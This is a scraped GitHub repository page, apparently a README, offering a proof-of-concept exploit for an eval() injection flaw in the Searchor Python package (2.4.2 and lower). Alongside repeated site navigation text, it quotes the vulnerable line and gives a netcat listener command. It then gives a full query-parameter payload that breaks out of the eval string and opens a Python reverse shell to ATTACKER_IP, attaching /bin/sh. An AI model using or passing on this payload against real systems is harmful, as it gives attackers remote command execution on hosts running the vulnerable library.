Searchor-2.4.0-POC-Exploit-

eval() Exploit POC for Searchor 2.4.2 and lower (2.4.0 as well) leading to Arbitrary Code Execution
vulnerability Reference: https://github.com/ArjunSharda/Searchor/commit/29d5b1f28d29d6a282a5e860d456fab2df24a16b

Vulnerable code includes eval() method:

url = eval( f"Engine.{engine}.search('{query}', copy_url={copy}, open_web={open})" )

If user parameter query is not sanitized it leads to RCE.

    Exploit code for linux target 
    Prepare a listener: nc -lvnp PORT

Send this as query parameter to the tested host

', exec("import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('ATTACKER_IP',PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(['/bin/sh','-i']);"))#

Name		Name	Last commit message	Last commit date
Latest commit History 10 Commits
README.md		README.md

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

README.md

README.md

Repository files navigation

Searchor-2.4.0-POC-Exploit-

Vulnerable code includes eval() method:

If user parameter query is not sanitized it leads to RCE.

Send this as query parameter to the tested host

About

Releases

Packages

nexis-nexis/Searchor-2.4.0-POC-Exploit-

Folders and files

Latest commit

History

README.md

README.md

Repository files navigation

Searchor-2.4.0-POC-Exploit-

Vulnerable code includes eval() method:

If user parameter query is not sanitized it leads to RCE.

Send this as query parameter to the tested host

About

Resources

Stars

Watchers

Forks

Releases

Packages 0

Packages